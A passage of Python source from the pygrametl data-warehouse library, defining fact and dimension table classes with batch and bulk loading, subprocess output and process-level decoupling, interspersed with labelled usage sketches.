def _emptyfacttonone(self, argdict):
"""Return None if the given argument only contains None values,
otherwise return the given argument
"""
for k in self.keyrefs:
if argdict[k] is not None:
return argdict
return None
def lookup(self, keyvalues, namemapping={}):
"""Lookup a fact from the given key values. Return key and measure vals.
Return None if no fact is found.
Arguments:
- keyvalues: a dict at least containing values for all keys
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_lookup(keyvalues, namemapping)
if res:
return self._emptyfacttonone(res)
self.targetconnection.execute(self.lookupsql, keyvalues, namemapping)
res = self.targetconnection.fetchone(self.all)
self._after_lookup(keyvalues, namemapping, res)
return self._emptyfacttonone(res)
def _before_lookup(self, keyvalues, namemapping):
return None
def _after_lookup(self, keyvalues, namemapping, resultrow):
pass
def ensure(self, row, compare=False, namemapping={}):
"""Ensure that a fact is present (insert it if it is not already there).
Arguments:
- row: a dict at least containing the attributes of the fact table
- compare: a flag deciding if measure vales from a fact that was
looked up are compared to those in the given row. If True and
differences are found, a ValueError is raised. Default: False
- namemapping: an optional namemapping (see module's documentation)
"""
res = self.lookup(row, namemapping)
if not res:
self.insert(row, namemapping)
return False
elif compare:
for m in self.measures:
if m in row and row[m] != res.get(m):
raise ValueError(
"The existing fact has different measure values")
return True
def endload(self):
"""Finalize the load."""
pass
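# --- Illustrative usage sketch (editor's addition, not part of pygrametl) ---
# A minimal sketch of how a FactTable is typically wired up. The psycopg2
# driver, the "dbname=dw" DSN and the table/column names are assumptions
# made for illustration only.
def _example_facttable_usage():
    import psycopg2
    # The first ConnectionWrapper created is assumed to become the default
    # target connection used by tables created without a targetconnection.
    pygrametl.ConnectionWrapper(connection=psycopg2.connect("dbname=dw"))
    facttbl = FactTable(name='sales',
                        keyrefs=['bookid', 'dateid'],
                        measures=['amount'])
    facttbl.insert({'bookid': 1, 'dateid': 20140223, 'amount': 5})
    # ensure() only inserts if an identical fact is not already present
    facttbl.ensure({'bookid': 1, 'dateid': 20140223, 'amount': 5})
    pygrametl.commit()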
class BatchFactTable(FactTable):
"""A class for accessing a fact table in the DW. This class performs
performs insertions in batches.
"""
def __init__(self, name, keyrefs, measures=(), batchsize=10000,
targetconnection=None):
"""Arguments:
- name: the name of the fact table in the DW
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact table (i.e., the dimension references)
- measures: a possibly empty sequence of measure names. Default: ()
- batchsize: an int deciding how many insert operations should be done
in one batch. Default: 10000
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
FactTable.__init__(self,
name=name,
keyrefs=keyrefs,
measures=measures,
targetconnection=targetconnection)
self.__batchsize = batchsize
self.__batch = []
def _before_insert(self, row, namemapping):
self.__batch.append(pygrametl.project(self.all, row, namemapping))
if len(self.__batch) == self.__batchsize:
self.__insertnow()
return True # signal that we did something
def _before_lookup(self, keyvalues, namemapping):
self.__insertnow()
def endload(self):
"""Finalize the load."""
self.__insertnow()
def __insertnow(self):
if self.__batch:
self.targetconnection.executemany(self.insertsql, self.__batch)
self.__batch = []
class _BaseBulkloadable(object):
"""Common functionality for bulkloadable tables"""
def __init__(self, name, atts, bulkloader,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=500000, usefilename=False,
encoding=None, dependson=()):
r"""Arguments:
- name: the name of the table in the DW
- atts: a sequence of the bulkloadable tables' attribute names
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is a list of the names of the columns to
insert values into and show the order in which the attribute
values appear in the temporary file. The rest of the arguments
are similar to those arguments with identical names that are given
to _BaseBulkloadable.__init__ as described here. The argument
"tempdest" can, however, be 1) a string with a filename or
2) a file object. This is determined by the usefilename argument to
_BaseBulkloadable.__init__ (see below).
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 500000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object.
Default: False
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
- dependson: a sequence of other bulkloadable tables that should
be loaded before this instance does bulkloading (e.g., if
a fact table has foreign keys to some bulkloaded dimension tables).
Default: ()
"""
self.name = name
self.atts = atts
self.__close = False
if tempdest is None:
self.__close = True
self.__namedtempfile = tempfile.NamedTemporaryFile()
tempdest = self.__namedtempfile.file
self.fieldsep = fieldsep
self.rowsep = rowsep
self.nullsubst = nullsubst
self.bulkloader = bulkloader
self.tempdest = tempdest
self.bulksize = bulksize
self.usefilename = usefilename
if encoding is not None:
self.encoding = encoding
else:
self.encoding = locale.getpreferredencoding()
self.dependson = dependson
if version_info[0] == 2:
# Python 2: We ignore the specified encoding
self._tobytes = lambda data, encoding: str(data)
else:
# Python 3: We make _tobytes use the specified encoding:
self._tobytes = lambda data, encoding: bytes(data, encoding)
self.__count = 0
self.__ready = True
def __preparetempfile(self):
self.__namedtempfile = tempfile.NamedTemporaryFile()
self.tempdest = self.__namedtempfile.file
self.__ready = True
def _insertwithnulls(self, row, namemapping={}):
"""Insert (eventually) a row into the table.
Arguments:
- row: a dict at least containing values for each of the tables'
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
if not self.__ready:
self.__preparetempfile()
rawdata = [row[namemapping.get(att) or att] for att in self.atts]
data = [pygrametl.getstrornullvalue(val, self.nullsubst)
for val in rawdata]
self.__count += 1
self.tempdest.write(
self._tobytes(
"%s%s" % (self.fieldsep.join(data), self.rowsep),
self.encoding))
if self.__count == self.bulksize:
self._bulkloadnow()
def _insertwithoutnulls(self, row, namemapping={}):
"""Insert (eventually) a row into the table.
Arguments:
- row: a dict at least containing values for each of the tables'
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
if not self.__ready:
self.__preparetempfile()
data = [str(row[namemapping.get(att) or att]) for att in self.atts]
self.__count += 1
self.tempdest.write(
self._tobytes("%s%s" % (self.fieldsep.join(data), self.rowsep),
self.encoding))
if self.__count == self.bulksize:
self._bulkloadnow()
def _bulkloadnow(self):
if self.__count == 0:
return
for b in self.dependson:
if hasattr(b, '_bulkloadnow'):
b._bulkloadnow()
self.tempdest.flush()
self.tempdest.seek(0)
self.bulkloader(self.name, self.atts,
self.fieldsep, self.rowsep, self.nullsubst,
self.usefilename and self.__namedtempfile.name or
self.tempdest)
self.tempdest.seek(0)
self.tempdest.truncate(0)
self.__count = 0
def endload(self):
"""Finalize the load."""
self._bulkloadnow()
if self.__close:
try:
self.__namedtempfile.close()
except OSError:
pass # may happen if the instance was decoupled
self.__ready = False
def _decoupled(self):
if self.__close:
# We need to make a private tempfile
self.__namedtempfile = tempfile.NamedTemporaryFile()
self.tempdest = self.__namedtempfile.file
class BulkFactTable(_BaseBulkloadable):
"""Class for addition of facts to a fact table. Reads are not supported. """
def __init__(self, name, keyrefs, measures, bulkloader,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=500000, usefilename=False,
encoding=None, dependson=()):
r"""Arguments:
- name: the name of the fact table in the DW
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact table (i.e., the dimension references)
- measures: a possibly empty sequence of measure names.
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is the combination of keyrefs and measures
(i.e., a list of the names of the columns to insert values into)
and show the order in which the attribute values appear in the
temporary file. The rest of the arguments are similar to those
arguments with identical names that are given to
BulkFactTable.__init__ as described here. The argument "tempdest"
can, however, be 1) a string with a filename or 2) a file
object. This is determined by the usefilename argument to
BulkFactTable.__init__ (see below).
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 500000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object. This is,
e.g., necessary when the bulk loading is invoked through SQL
(instead of directly via a method on the PEP249 driver). It is
also necessary if the bulkloader runs in another process
(for example, when the BulkFactTable is wrapped by a
DecoupledFactTable and invokes the bulkloader on a shared
connection wrapper). Default: False
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
- dependson: a sequence of other bulkloadable tables that should
be bulkloaded before this instance does bulkloading (e.g., if
the fact table has foreign keys to some bulk-loaded dimension
table). Default: ()
"""
_BaseBulkloadable.__init__(self,
name=name,
atts=[k for k in keyrefs] + [m for m in measures],
bulkloader=bulkloader,
fieldsep=fieldsep,
rowsep=rowsep,
nullsubst=nullsubst,
tempdest=tempdest,
bulksize=bulksize,
usefilename=usefilename,
encoding=encoding,
dependson=dependson)
if nullsubst is None:
self.insert = self._insertwithoutnulls
else:
self.insert = self._insertwithnulls
pygrametl._alltables.append(self)
def insert(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
pass # Is set to _insertwithnulls or _insertwithoutnulls from __init__
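# --- Illustrative usage sketch (editor's addition, not part of pygrametl) ---
# A minimal sketch of a bulkloader callback with the documented signature
# m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) and of a
# BulkFactTable using it. psycopg2's copy_from and all table/column names
# are assumptions made for illustration only.
def _example_bulkfacttable_usage():
    import psycopg2
    pgconn = psycopg2.connect("dbname=dw")  # hypothetical DW database
    pygrametl.ConnectionWrapper(connection=pgconn)

    def pgbulkloader(name, atts, fieldsep, rowsep, nullsubst, tempdest):
        # Load the temporary file into the table with PostgreSQL's COPY.
        cursor = pgconn.cursor()
        cursor.copy_from(file=tempdest, table=name, sep=fieldsep,
                         columns=atts)

    facttbl = BulkFactTable(name='sales',
                            keyrefs=['bookid', 'dateid'],
                            measures=['amount'],
                            bulkloader=pgbulkloader,
                            bulksize=500000)
    facttbl.insert({'bookid': 1, 'dateid': 20140223, 'amount': 5})
    pygrametl.commit()  # calls endload(), which triggers the final bulk load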
class BulkDimension(_BaseBulkloadable, CachedDimension):
"""A class for accessing a dimension table. Does caching and bulk loading.
Unlike CachedBulkDimension, this class always caches all dimension data.
The class caches all dimension members in memory. Newly inserted
dimension members are also put into the cache. The class does not
INSERT new dimension members into the underlying database table
immediately when insert or ensure is invoked. Instead, the class does
bulk loading of new members. When a certain amount of new dimension
members have been inserted (configurable through __init__'s bulksize
argument), a user-provided bulkloader method is called.
Calls of lookup and ensure will only use the cache and do not invoke
any database operations. It is also possible to use the update and
getbyvals methods, but calls of these will invoke the bulkloader first
(and performance can degrade). If the dimension table's full rows
are cached (by setting __init__'s cachefullrows argument to True), a
call of getbykey will only use the cache, but if cachefullrows==False
(which is the default), the bulkloader is again invoked first.
We assume that the DB doesn't change or add any attribute
values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, bulkloader, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
cachefullrows=False,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=500000, usefilename=False,
encoding=None, dependson=(), targetconnection=None):
r"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is a list of the names of the columns to
insert values into and show the order in which the attribute
values appear in the temporary file. The rest of the arguments
are similar to those arguments with identical names that are
described below. The argument "tempdest" can, however, be
1) a string with a filename or 2) a file object. This is
determined by the usefilename argument (see below).
- lookupatts: A subset of the attributes that uniquely identify
a dimension member. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- cachefullrows: a flag deciding if full rows should be
cached. If not, the cache only holds a mapping from
lookupattributes to key values. Default: False.
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 500000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object. This is,
e.g., necessary when the bulk loading is invoked through SQL
(instead of directly via a method on the PEP249 driver). It is
also necessary if the bulkloader runs in another process.
Default: False
- dependson: a sequence of other bulkloadable tables that should
be loaded before this instance does bulkloading. Default: ()
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
"""
_BaseBulkloadable.__init__(self,
name=name,
atts=[key] + [a for a in attributes],
bulkloader=bulkloader,
fieldsep=fieldsep,
rowsep=rowsep,
nullsubst=nullsubst,
tempdest=tempdest,
bulksize=bulksize,
usefilename=usefilename,
encoding=encoding,
dependson=dependson)
CachedDimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=defaultidvalue,
rowexpander=rowexpander,
size=0,
prefill=True,
cachefullrows=cachefullrows,
cacheoninsert=True,
usefetchfirst=False,
targetconnection=targetconnection)
self.emptyrow = dict(zip(self.atts, len(self.atts) * (None,)))
if nullsubst is None:
self._insert = self._insertwithoutnulls
else:
self._insert = self._insertwithnulls
def _before_getbyvals(self, values, namemapping):
self._bulkloadnow()
return None
def _before_update(self, row, namemapping):
self._bulkloadnow()
return None
def getbykey(self, keyvalue):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
"""
if not self.cachefullrows:
self._bulkloadnow()
return CachedDimension.getbykey(self, keyvalue)
# else we do cache full rows and all rows are cached...
if isinstance(keyvalue, dict):
keyvalue = keyvalue[self.key]
row = self._before_getbykey(keyvalue)
if row is not None:
return row
else:
# Do not look in the DB; we cache everything
return self.emptyrow.copy()
def insert(self, row, namemapping={}):
"""Insert the given row. Return the new key value.
Arguments:
- row: the row to insert. The dict is not updated. It must contain
all attributes, and is allowed to contain more attributes than
that.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_insert(row, namemapping)
if res is not None:
return res
key = (namemapping.get(self.key) or self.key)
if row.get(key) is None:
keyval = self.idfinder(row, namemapping)
row = dict(row) # Make a copy to change
row[key] = keyval
else:
keyval = row[key]
self._insert(row, namemapping)
self._after_insert(row, namemapping, keyval)
return keyval
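# --- Illustrative usage sketch (editor's addition, not part of pygrametl) ---
# A minimal sketch of a BulkDimension. The bulkloader argument is assumed to
# be a callback like the pgbulkloader sketched above for BulkFactTable; the
# table and attribute names are hypothetical.
def _example_bulkdimension_usage(pgbulkloader):
    dim = BulkDimension(name='book',
                        key='bookid',
                        attributes=['title', 'genre'],
                        lookupatts=['title'],
                        bulkloader=pgbulkloader)
    bookid = dim.ensure({'title': 'Unknown', 'genre': 'Unknown'})
    # lookup() and ensure() are answered from the in-memory cache; the
    # actual INSERTs are deferred until the bulkloader is invoked.
    assert dim.lookup({'title': 'Unknown'}) == bookid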
class CachedBulkDimension(_BaseBulkloadable, CachedDimension):
"""A class for accessing a dimension table. Does caching and bulk loading.
Unlike BulkDimension, the cache size is configurable and lookups may
thus lead to database operations.
The class caches dimension members in memory. Newly inserted
dimension members are also put into the cache. The class does not
INSERT new dimension members into the underlying database table
immediately when insert or ensure is invoked. Instead, the class does
bulk loading of new members. When a certain amount of new dimension
members have been inserted (configurable through __init__'s bulksize
argument), a user-provided bulkloader method is called.
It is also possible to use the update and getbyvals methods, but calls
of these will invoke the bulkloader first (and performance can
degrade). If the dimension table's full rows are cached (by setting
__init__'s cachefullrows argument to True), a call of getbykey will only
use the cache, but if cachefullrows==False (which is the default), the
bulkloader is again invoked first.
We assume that the DB doesn't change or add any attribute
values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, bulkloader, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
usefetchfirst=False, cachefullrows=False,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=5000, cachesize=10000,
usefilename=False, encoding=None, dependson=(),
targetconnection=None):
r"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is a list of the names of the columns to
insert values into and show the order in which the attribute
values appear in the temporary file. The rest of the arguments
are similar to those arguments with identical names that are
described below. The argument "tempdest" can, however, be
1) a string with a filename or 2) a file object. This is
determined by the usefilename argument (see below).
- lookupatts: A subset of the attributes that uniquely identify
a dimension member. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
clause is used when prefill is True. Depending on the used DBMS
and DB driver, this can give significant savings wrt. time and
memory. Not all DBMSs support this clause yet. Default: False
- cachefullrows: a flag deciding if full rows should be
cached. If not, the cache only holds a mapping from
lookupattributes to key values. Default: False.
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 5000
- cachesize: the maximum number of rows to cache. If less than or equal
to 0, unlimited caching is used. Default: 10000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object. This is,
e.g., necessary when the bulk loading is invoked through SQL
(instead of directly via a method on the PEP249 driver). It is
also necessary if the bulkloader runs in another process.
Default: False
- dependson: a sequence of other bulkloadable tables that should
be loaded before this instance does bulkloading. Default: ()
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
"""
_BaseBulkloadable.__init__(self,
name=name,
atts=[key] + [a for a in attributes],
bulkloader=bulkloader,
fieldsep=fieldsep,
rowsep=rowsep,
nullsubst=nullsubst,
tempdest=tempdest,
bulksize=bulksize,
usefilename=usefilename,
encoding=encoding,
dependson=dependson)
CachedDimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=defaultidvalue,
rowexpander=rowexpander,
size=cachesize,
prefill=True,
cachefullrows=cachefullrows,
cacheoninsert=True,
usefetchfirst=usefetchfirst,
targetconnection=targetconnection)
self.emptyrow = dict(zip(self.atts, len(self.atts) * (None,)))
self.__localcache = {}
self.__localkeys = {}
if nullsubst is None:
self._insert = self._insertwithoutnulls
else:
self._insert = self._insertwithnulls
def _before_lookup(self, row, namemapping):
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
if searchtuple in self.__localcache:
return self.__localcache[searchtuple][self.key]
return CachedDimension._before_lookup(self, row, namemapping)
def _before_getbyvals(self, values, namemapping):
self._bulkloadnow()
return None
def _before_update(self, row, namemapping):
self._bulkloadnow()
return None
def _bulkloadnow(self):
emptydict = {}
for key, row in self.__localkeys.items():
self._after_insert(row, emptydict, key)
self.__localcache.clear()
self.__localkeys.clear()
_BaseBulkloadable._bulkloadnow(self)
return
def getbykey(self, keyvalue):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
"""
if isinstance(keyvalue, dict):
keyvalue = keyvalue[self.key]
if keyvalue in self.__localkeys:
return self.__localkeys[keyvalue].copy()
return CachedDimension.getbykey(self, keyvalue)
def lookup(self, row, namemapping={}):
return CachedDimension.lookup(self, row, namemapping=namemapping)
def insert(self, row, namemapping={}):
"""Insert the given row. Return the new key value.
Arguments:
- row: the row to insert. The dict is not updated. It must contain
all attributes, and is allowed to contain more attributes than
that.
- namemapping: an optional namemapping (see module's documentation)
"""
row = pygrametl.copy(row, **namemapping)
searchtuple = tuple([row[n] for n in self.lookupatts])
res = self._before_insert(row, {})
if res is not None:
return res
if row.get(self.key) is None:
keyval = self.idfinder(row, {})
row[self.key] = keyval
else:
keyval = row[self.key]
if searchtuple in self.__localcache:
return self.__localcache[searchtuple]
self._insert(row, {})
self.__localcache[searchtuple] = row
self.__localkeys[keyval] = row
return keyval
class SubprocessFactTable(object):
"""Class for addition of facts to a subprocess.
The subprocess can, e.g., be a logger or bulkloader. Reads are not
supported.
Note that a created instance can not be used when endload() has been
called (and endload() is called from pygrametl.commit()).
"""
def __init__(self, keyrefs, measures, executable,
initcommand=None, endcommand=None, terminateafter=-1,
fieldsep='\t', rowsep='\n', nullsubst=None,
buffersize=16384):
r"""Arguments:
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact table (i.e., the dimension references)
- measures: a possibly empty sequence of measure names. Default: ()
- executable: The subprocess to start.
- initcommand: If not None, this command is written to the
subprocess before any data.
- endcommand: If not None, this command is written to the subprocess
after all data has been written.
- terminateafter: If greater than or equal to 0, the subprocess
is terminated after this amount of seconds after the pipe to
the subprocess is closed.
- fieldsep: a string used to separate fields in the output
sent to the subprocess. Default: '\t'
- rowsep: a string used to separate rows in the output sent to the
subprocess. Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
"""
self.all = [k for k in keyrefs] + [m for m in measures]
self.keyrefs = keyrefs
self.measures = measures
self.endcommand = endcommand
self.terminateafter = terminateafter
self.fieldsep = fieldsep
self.rowsep = rowsep
self.nullsubst = nullsubst
self.process = Popen(executable, bufsize=buffersize, shell=True,
stdin=PIPE)
self.pipe = self.process.stdin
if nullsubst is None:
self.insert = self._insertwithoutnulls
else:
self.insert = self._insertwithnulls
if initcommand is not None:
self.pipe.write(initcommand)
pygrametl._alltables.append(self)
def insert(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
pass # Is set to _insertwithnulls or _insertwithoutnulls from __init__
def _insertwithnulls(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
rawdata = [row[namemapping.get(att) or att] for att in self.all]
data = [pygrametl.getstrornullvalue(val, self.nullsubst)
for val in rawdata]
self.pipe.write("%s%s" % (self.fieldsep.join(data), self.rowsep))
def _insertwithoutnulls(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
data = [str(row[namemapping.get(att) or att]) for att in self.all]
self.pipe.write("%s%s" % (self.fieldsep.join(data), self.rowsep))
def endload(self):
"""Finalize the load."""
if self.endcommand is not None:
self.pipe.write(self.endcommand)
self.pipe.close()
if self.terminateafter >= 0:
sleep(self.terminateafter)
self.process.terminate()
else:
self.process.wait()
def _decoupling(self):
"""Raise a TypeError to avoid decoupling (does not happen in Jython)"""
import sys
if sys.platform.startswith('java'):
# In Jython, we use threads for decoupling and we do not have
# to prevent it.
return
raise TypeError('A SubProcessFactTable cannot be decoupled')
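# --- Illustrative usage sketch (editor's addition, not part of pygrametl) ---
# A minimal sketch of a SubprocessFactTable. The shell pipeline used as the
# executable and the key/measure names are hypothetical; rows are written to
# the subprocess's stdin in the configured field/row-separated format.
def _example_subprocessfacttable_usage():
    facttbl = SubprocessFactTable(keyrefs=['bookid', 'dateid'],
                                  measures=['amount'],
                                  executable='gzip > facts.csv.gz')
    facttbl.insert({'bookid': 1, 'dateid': 20140223, 'amount': 5})
    facttbl.endload()  # close the pipe and wait for the subprocess to exit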
class DecoupledDimension(pygrametl.parallel.Decoupled):
"""A Dimension-like class that enables parallelism by executing all
operations on a given Dimension in a separate, dedicated process
(that Dimension is said to be "decoupled").
"""
def __init__(self, dim, returnvalues=True, consumes=(), attstoconsume=(),
batchsize=500, queuesize=200):
"""Arguments:
- dim: the Dimension object to use in a separate process
- returnvalues: decides if return values from method calls on dim
should be kept such that they can be fetched by the caller or
another Decoupled instance
- consumes: a sequence of Decoupled objects from which to fetch
returnvalues (that are used to replace FutureResults in arguments).
Default: ()
- attstoconsume: a sequence of the attribute names in rows that
should have FutureResults replaced by actual return values. Does
not have to be given, but may improve performance when given.
Default: ()
- batchsize: the size of batches (grouped method calls) transferred
between the processes. NB: Large values do not necessarily give
good performance
Default: 500
- queuesize: the maximum amount of waiting batches. Infinite if
less than or equal to 0. NB: Large values do not necessarily give
good performance.
Default: 200
"""
pygrametl.parallel.Decoupled.__init__(self,
obj=dim,
returnvalues=returnvalues,
consumes=consumes,
directupdatepositions=
tuple([(0, a) for a in
attstoconsume]),
batchsize=batchsize,
queuesize=queuesize,
autowrap=False)
if dim in pygrametl._alltables:
pygrametl._alltables.remove(dim) # We add self instead...
pygrametl._alltables.append(self)
def lookup(self, row, namemapping={}):
"""Invoke lookup on the decoupled Dimension in the separate process"""
return self._enqueue('lookup', row, namemapping)
def getbykey(self, keyvalue):
"""Invoke getbykey on the decoupled Dimension in the separate process"""
return self._enqueue('getbykey', keyvalue)
def getbyvals(self, row, namemapping={}):
"Invoke betbycals on the decoupled Dimension in the separate process"
return self._enqueue('getbyvals', row, namemapping)
def insert(self, row, namemapping={}):
"""Invoke insert on the decoupled Dimension in the separate process"""
return self._enqueue('insert', row, namemapping)
def ensure(self, row, namemapping={}):
"""Invoke ensure on the decoupled Dimension in the separate process"""
return self._enqueue('ensure', row, namemapping)
def endload(self):
"""Invoke endload on the decoupled Dimension in the separate process and
return when all waiting method calls have been executed
"""
# first add 'endload' to the batch and then send the batch
self._enqueuenoreturn('endload')
self._endbatch()
self._join()
return None
def scdensure(self, row, namemapping={}):
"Invoke scdensure on the decoupled Dimension in the separate process"
if hasattr(self._obj, 'scdensure'):
return self._enqueue('scdensure', row, namemapping)
else:
raise AttributeError('The object does not support scdensure')
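# --- Illustrative usage sketch (editor's addition, not part of pygrametl) ---
# A minimal sketch of decoupling a dimension. It assumes a default target
# connection has already been created; the table and attribute names are
# hypothetical.
def _example_decoupleddimension_usage():
    dim = CachedDimension(name='book',
                          key='bookid',
                          attributes=['title', 'genre'],
                          lookupatts=['title'])
    ddim = DecoupledDimension(dim, returnvalues=True)
    # Method calls are queued and executed in a separate, dedicated process;
    # with returnvalues=True the result can later be consumed as a
    # FutureResult by, e.g., a DecoupledFactTable that consumes this object.
    ddim.ensure({'title': 'Unknown', 'genre': 'Unknown'})
    ddim.endload()  # block until all queued method calls have been executed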
class DecoupledFactTable(pygrametl.parallel.Decoupled):
"""A FactTable-like class that enables parallelism by executing all
operations on a given FactTable in a separate, dedicated process
(that FactTable is said to be "decoupled").
"""
def __init__(self, facttbl, returnvalues=True, consumes=(),
attstoconsume=(), batchsize=500, queuesize=200):
"""Arguments:
- facttbl: the FactTable object to use in a separate process
- returnvalues: decides if return values from method calls on facttbl
should be kept such that they can be fetched by the caller or
another Decoupled instance
- consumes: a sequence of Decoupled objects from which to fetch
returnvalues (that are used to replace FutureResults in arguments).
Default: ()
- attstoconsume: a sequence of the attribute names in rows that
should have FutureResults replaced by actual return values. Does
not have to be given, but may improve performance when given.
Default: ()
- batchsize: the size of batches (grouped method calls) transferred
between the processes. NB: Large values do not necessarily give
good performance
Default: 500
- queuesize: the maximum amount of waiting batches. Infinite if
less than or equal to 0. NB: Large values do not necessarily give
good performance.
Default: 200
"""
pygrametl.parallel.Decoupled.__init__(self,
obj=facttbl,
returnvalues=returnvalues,
consumes=consumes,
directupdatepositions=tuple([(0,
a) for a in attstoconsume]),
batchsize=batchsize,
queuesize=queuesize,
autowrap=False)
if facttbl in pygrametl._alltables:
pygrametl._alltables.remove(facttbl) # We add self instead
pygrametl._alltables.append(self)
def insert(self, row, namemapping={}):
"""Invoke insert on the decoupled FactTable in the separate process"""
return self._enqueue('insert', row, namemapping)
def endload(self):
"""Invoke endload on the decoupled FactTable in the separate process and
return when all waiting method calls have been executed
"""
self._enqueuenoreturn('endload')
self._endbatch()
self._join()
return None
def lookup(self, row, namemapping={}):
"""Invoke lookup on the decoupled FactTable in the separate process"""
